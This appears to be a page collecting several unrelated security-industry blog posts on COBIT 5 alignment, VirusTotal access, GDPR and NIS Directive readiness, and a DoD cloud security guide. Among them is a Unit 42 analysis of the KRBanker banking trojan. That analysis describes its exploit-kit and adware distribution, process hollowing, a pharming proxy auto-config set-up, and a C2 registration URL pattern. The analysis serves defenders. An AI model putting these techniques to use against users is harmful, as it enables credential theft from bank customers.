Developing and using models to help represent relationships between business strategy and IT is an effective method to show the strategic effect of IT within the enterprise. As more and more business commerce becomes automated, the growing impact of IT on business strategy, such as the development of a sustained competitive advantage in a highly connected world, becomes increasingly evident.
Alignment of IT and business strategies is paramount for achieving and maintaining a leadership position. Today, the elements that differentiate one successful organization from another are difficult to observe and measure as the power of imitation levels the playing field, making a business-driven, information-centric and technology-supported strategy imperative.
How Does COBIT 5 Contribute to the Alignment of Goals?
COBIT 5 is an integrated framework that facilitates the achievement of the business’s strategic goals and solidifies value through an effective IT governance and management approach.
COBIT 5 provides for the governance and management of enterprise IT (GEIT) in a holistic way for the whole organization, taking into account the needs of business and functional area stakeholders and driving the business´s strategic goals in an end-to-end fashion throughout the enterprise. Because COBIT 5 aims to help organizations achieve balance in financial, customer, internal process, and learning and growth goal sets, the framework may be applied to public, private or nonprofit organizations.
Upon adopting COBIT 5, the organization will be able to identify strengths and weaknesses associated with its IT processes and environment. This, in turn, will identify areas where processes can be optimized to better support the organization’s goals and provide for safer, more dependable operations. Similarly, the organization will be able to ensure that IT has the correct direction, i.e., alignment with strategic business goals.
Implementation Stages
A successful strategy for implementing COBIT 5 always begins with identifying the drivers for developing the organization’s goals and the primary results the organization would like to achieve, whether it be realizing the benefits of a strategy or optimizing risk or resources. Once this is understood, an implementation of COBIT 5 should consider the stages shown in figure 1.
Figure 1—COBIT 5 Implementation Stages
Source: A. Zapata. Reprinted with permission.
COBIT 5 provides a powerful framework for the identification of enterprise goals. It also enables each critical process to be directly aligned to achievement of these goals in a way that can be easily measured and communicated. By applying the proven and efficient implementation strategy suggested, any organization can understand how effectively it is achieving these goals and ensure transparency across all functional areas.
Alexander Zapata, CISA, CGEIT, CRISC, COBIT 5 Implementation and Assessor, ISO 22301 LI, ISO 27001 and Foundations, PMP
Is an international consultant in IT governance and IT improvement with experience in Mexico, Colombia, Panama and Peru. He is also an expert instructor and COBIT 5 Accredited Trainer. He can be reached atazapatacolombia@yahoo.com.
Alexander Zapata, CISA, CGEIT, CRISC, COBIT 5 Implementation and Assessor, ISO 22301 LI, ISO 27001 and Foundations, PMP
On Wednesday, May 4, VirusTotal cut off unlimited ratings access to companies that do not share their own evaluations of submitted research samples.
How does this impact Palo Alto Networks customers?
There is no impact to Palo Alto Networks customers or the protections our customers receive from us. VirusTotal will continue to provide subscribers, including Palo Alto Networks, access to all file samples. There is no change to the way we work with VirusTotal. Palo Alto Networks collects files samples from as many sources as possible. VirusTotal is one of many sources we use, but we do not rely on VirusTotal or any other third-party service to provide file verdict.
Palo Alto Networks relies on our WildFire cloud-based malware analysis environment to determine if a file is malware, greyware or benign based on static and dynamic analysis.
Online banking services have been a prime target of cyber criminals for many years and attacks continue to grow. Targeting online banking users and stealing their credentials has yielded huge profits for the criminals behind these campaigns. Unit 42 has been tracking “KRBanker” AKA ‘Blackmoon’, since late last year. This campaign specifically targets banks of the Republic of Korea. On April 23, researchers at Fortinet published a blog describing the functionalities of the recent ‘Blackmoon’ campaign. Our objective in this blog is to share additional details on the distribution of the KRBanker or Blackmoon malware campaign and indicators of KRBanker samples.
Early variants of this campaign started surfacing in late September 2015. Though the number of KRBanker infection attempts was relatively low in 2015, we have noticed a gradual increase in the number of sessions since the start of 2016, and identified close to 2,000 unique samples of KRBanker and 200+ pharming server addresses in the last 6 months.
Figure 1 KRBanker download sessions on Autofocus
Malware Distribution
Our analysis shows that KRBanker has been distributed through web exploit kits (EK) and a malicious Adware campaign. The exploit kit used for installing KRBanker is known as KaiXin and the Adware which distributes it is called NEWSPOT.
In March 2016, Unit 42’s Brad Duncan wrote two articles for SANS and Malware-Traffic-Analysis.Net, noting that the KaiXin EK is observed in Republic of Korea. In those cases, malicious JavaScript through compromised web sites or advertisements led to the EK that exploited Adobe Flash vulnerabilities CVE-2014-0569 or CVE-2015-3133. We confirmed that final payload in both cases was KRBanker.
Another distribution channel is a malicious Adware program, called NEWSPOT. According to the marketing document of the product, NEWSPOT guarantees 300% revenue growth for online shopping sites . NEWSPOT is a basic adware program that displays advertisements in browsers, but since at least November 2015 has started installing malware.When visiting some Korean websites, a user may notice a pop-up of a browser add-on requesting installation for NEWSPOT.
Figure 2 Installing NEWSPOT tool
If installed, the adware is executed on the computer and starts getting configuration from the following URL:
It downloads a file from URL described in the <update> section within the configuration data returned by the server.
Figure 3 Configuration file contains download link to malware
This might have originally been used to update the NEWSPOT software, but we have confirmed that Banking Trojans like KRBanker and Venik has been installed through this update channel. Figure 4 shows the URLs:
Figure 4 Downloading Banking Trojans from NEWSPOT update channel
Execution
KRBanker uses Process Hollowing to execute its main code in a clean (non-suspicious) executable. The process is as follows:
KRBanker executes a clean PE file in System directory.
Windows loads the PE file into memory.
KRBanker overwrites the whole clean process with its own (malicious) main module.
Overwritten process starts malicious activity.
Figure 5 Execution Steps
Figure 6 Execution Steps (cont.)
After a successful execution the Windows Firewall alerts the user on the process attempting to access the Internet. Many users may allow this activity because the process originally involved a clean Microsoft file.
Figure 7 Windows Firewall Alert
Pharming
Banking trojans like Dridex or Vawtrak mainly employ Man-in-the-browser(MitB) techniques to steal credentials from targeted victims. However, KRBanker uses a different technique known as “pharming.” This technique involves redirecting traffic to a forged website when a user attempts to access one of the banking sites being targeted by the cyber criminals. The fake server masquerades the original site and urges visitors to submit their information and credentials.
Set Up
The IP address of the fraudulent server is not hard-coded in the malware. KRBanker obtains the server address by accessing Chinese SNS, Qzone through a Web API. The API provides basic user information by sending QQ number to the following URL.
users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=[QQ ID Number]
The server then responds with the QQ ID Number, link to picture, nick name and some other information from SNS profile identified by the QQ ID Number. The author of the trojan put the Pharming server address in the “nickname” field.
Following is an example response that contains the IP address, 23.107.204[.]38 which is then extracted by KRBanker for Pharming.
Figure 8 Receiving IP address for Pharming from QZone
Next, KRBanker gets the MAC Address using an embedded VBScript and code page by executing GetOEMCP() API on the compromised system. It then registers the compromised system with the C2 server by sending the following HTTP GET request:
http://[IP address]/ca.php?m=[encoded MAC Address]&h=[code page]
Proxy Auto-Config
Researchers at ALYac had reported previously, on KRBanker employing hosts file modificationand local DNS proxy techniques to redirect HTTP traffic. The latest version of the threat employs Proxy Auto-Config(PAC), a legitimate function on Windows and Network administrators that can define an appropriate proxy address for each URL by writing JavaScript, and was also mentioned by Fortinet on their blog post. The adversaries abuse this feature for Pharming.
To configure this, the Trojan starts a local proxy server and creates the following registry entry.
Figure 9 Malicious JavaScript for Proxy Auto-Config
After decrypting the JavaScript we can see the function for PAC, FindProxyForURL() which is used to check for a list of targeted sites.
Figure 10 Decrypted malicious JavaScript
When the browser attempts to connect to a web server, the traffic goes to the local proxy. The malicious JavaScript on the Proxy PAC checks the domain with the list of targets using the FindProxyForURL() function. If the domain being accessed matches with any of the targets from the list, the traffic goes to a fraudulent server. If not, it goes to the legitimate domain being requested.
Figure 11 Redirecting traffic by Proxy Auto-Config
Current, KRBanker is targeting a large list of Korean financial institutions using this Pharming attack.
When a compromised user visits one of the targeted websites, the user will see a page like the one shown in Figure 12 below. It appears to look like a legitimate webpage with a valid URL displayed on the address bar of the browser. However, this is a fake website for stealing the credentials and account information of the victims.
Figure 12 Fake Authorized Certification Center for renewal
KRBanker is also capable of taking the following actions:
Stealing certification from NPKI directory in order to access online bankingaccounts
Terminating Ahnlab’s V3 security software
Conclusion
Profit is the primary motivator for attackers who use banking Trojans. The adversary behind KRBanker has been developing new distribution channels, evolving the pharming techniques multiple times, and releasing new variants on a daily basis to maximize the revenue from victims.
As described in this article, the threat is distributed through Exploit Kits that exploit old vulnerabilities and Adware that needs to be manually installed. It is essential to understand the infection vectors of such campaigns to minimize the impact. Palo Alto Networks Autofocus users can track this threat using the ‘KRBanker’ Autofocus tag.
Indicators
The indicators on KRBanker can be found on Unit 42’s github page below
For some, the upcoming EU legislative changes (the General Data Protection Regulation, referred to as GDPR, and the Network and Information Security Directive, referred to as the NIS Directive) may have seemed like they are a long time in coming, since early discussions started back in 2013. Yet as is often the case with such processes, it becomes all too easy to keep holding off from preparing, especially when details are still to be finalized. From current speculation, it seems that both will be documented in the Official Journal of the EU shortly, which – for those who haven’t already started preparing – should be the final call to action, and implementation will officially start.
The question for many now becomes: Are they at the right place on the journey? Human nature drives us to want to compare ourselves with our neighbors to ensure we are doing the right things, and where there are time deadlines, that we are on track to achieve them.
From a recent webinar run with the industry group ISACA, I took the chance to poll the attendees to gather more insight on organizations’ state of preparation in terms of their cyber security strategies.
With any legislative requirements, the first objective is to be clear on what needs to be done. In this instance both pieces of legislation use the term “State of the Art”, which aligns to the requirement to have security by design and default. Specifically with the GDPR, that requires regard for this to be relevant to the risk.
In the last 12 months, exactly what “State of the Art” means has seemed to be one of the most common questions, as many security practitioners and leaders are typically more confident with granular requirements. But in polling the 1400+ people who registered for the recent webinar, it was found that 64 percent of those who responded now claimed to know what “State of the Art” is. Unlike some other industry regulatory requirements, GDPR and the NIS Directive will likely remain in force for a while. As such, it would be virtually impossible to define detailed requirements; the term is more a placeholder requiring organizations to ensure they keep educated on cutting-edge cybersecurity capabilities and processes.
I have found myself having numerous discussions with other industry experts around how we would be sure that each of our interpretations of “State of the Art” would stand up to an auditor or another company. As such, my guidance would be that whilst we often look at the technical aspects of legislation, it’s important to engage with the business and legal teams in your company to ensure there is consensus on your interpretation of the requirement. Whether we like it or not, we should be prepared to qualify our adherence, be that to an auditor or to an authority, when responding to an incident.
Although it’s great to see that many are comfortable with the concept, there are others who are still getting their heads around the additional responsibility. I suspect more broadly that while the first goal will be to validate and achieve the relevant regard for “State of the Art”, very quickly cyber security leaders will also need to qualify just how long the current interpretation remains the case, as (it’s not a one-off goal, but an iterative requirement). As such, processes that continue to validate and subsequently apply ”State of the Art” must become part of the normal cyber strategy.
The challenge for many is that while we look to prepare for these legislative changes, we still have a day job. Therefore the question becomes: Where does it sit in the priority stack? Here the poll showed that there was a split in views. Thirty-six percent had this in their top 10, and an additional 21percent had it in their top three. Yet 20 percent were only planning to look at these legislative requirements in 2017, and a further 16 percent were planning to wait until the requirements come into effect in 2018. It would be interesting to see the industry breakdowns here, as I could speculate that those that are already more heavily regulated may be more proactive, as they are used to the process. But from my own experiences, I also have seen regional perceptions of legislation enforcements, especially when the historical variance in enforcement of data protection requirements could be a factor. The goal of harmonization, which was one of the key drivers of GDPR reform, aims to ensure we all abide by the same rules and enforcement guidelines.
My personal guidance here would be that if you haven’t already started to prepare, you should do so now. It takes time to validate the gap analysis (again for those that are already heavily regulated, this may be much smaller than those that are not today), but agreeing on a budget, validating solutions and deploying and testing capabilities all take time.
At an executive level, the natural first question when discussing the proposed new legislation is: What impact does that have on our business? Here the replies to the poll were very broad. Many were still unclear, while others focused on either the brand damage concerns that would likely come from public disclosure of an incident, or concerns around the new penalties for data breaches that have been defined in the GDPR. The very broad scope of responses, I would suggest, should be our biggest concern. If the impact to businesses cannot be clearly defined, how can they be expected to support their cybersecurity teams in investing time and resources to achieve compliance? As such, while it seems confidence is growing when it comes to some of the terminology, such as “State of the Art”, there is still a need to be clearer on the impact of these new regulations. For me this highlights why many are still holding off in terms of making it a priority for 2016.
IT officials from the Department of Defense (DoD) have released an update to the Cloud Computing Security Requirements Guide (CC SRG), which establishes security requirements and other criteria for commercial and non-Defense Department cloud providers to operate within DoD. These kinds of updates are not uncommon. In fact, they are encouraged through an interesting use of a DevOps type methodology – as the DoD explains:
DoD Cloud computing policy and the CC SRG is constantly evolving based on lessons learned with respect to the authorization of Cloud Service Offerings and their use by DoD Components. As such the CC SRG is following an “Agile Policy Development” strategy and will be updated quickly when necessary.
The DoD offers a continuous public review option and accepts comments on the current version of the CC SRG at all times, moving to update the document quickly and regularly to address the constantly changing concerns of an evolving technology like public and private cloud infrastructure. The most recent update includes administrative changes and corrections and some expanded guidance on previously instated requirements, with the main focus on the updates being to clarify standards set in version one and alleviate confusion and any potential inaccuracy.
What is particularly interesting here is the DoD’s acknowledgment that management of cloud environments is constantly evolving, security requirements and best practices need to be iterative, and updates need to be made regularly to ensure relevancy. It’s also important to note that the CC SRG is only one of many government policies put in place to help government agencies securely and effectively implement cloud infrastructures. There are also guidelines like NIST SP 800-37 Risk Management, NIST 800-53, FISMA and FedRAMP to consider. All of these provide a knowledge base for cloud computing security authorization processes and security requirements for government agencies.
What the DoD’s updates to the CC SRG should reinforce for agencies is that they need to have a clear cloud strategy in place in order to ensure compliance and success in the cloud. Determining the best implementation of these guidelines for your needs is difficult in and of itself. Add to that the ongoing management and updates required to keep up with ever-evolving guidelines and an IT team can find itself struggling.
By partnering with systems integrators and software vendors, or working directly with a managed service provider, like Datapipe, government agencies can more easily develop a long-term cloud strategy to architect, deploy, and manage high-security and high-performance cloud and hosted solutions, and stay on top of evolving government policies and guidelines.
